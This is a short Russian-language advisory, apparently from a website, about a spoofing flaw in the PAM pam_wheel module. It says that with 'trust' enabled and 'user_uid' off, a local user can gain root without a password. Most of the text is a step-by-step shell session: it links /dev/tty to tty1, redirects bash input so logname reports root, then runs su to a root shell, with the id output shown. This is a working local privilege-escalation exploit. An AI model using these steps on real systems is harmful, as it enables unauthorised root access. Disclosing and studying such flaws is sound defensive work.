Pluggable Authentication Module (PAM) (механизм аутентификации) подвержен так называемой spoofing vulnerability. Если опция
trust включена в pam_wheel конфигурационном файле и опция
user_uid выключена, любой локальный юзер может обмануть систему и получить супер права без пароля. Вот пример,
который показывает как это сделать:

$ w
10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 — 7:13am 3:03m 0.30s 0.22s -bash
farmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? —
$ logname
farmer
$ ln /dev/tty tty1
$ bash < tty1
$ logname
root
$ su —
# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)



Оставить мнение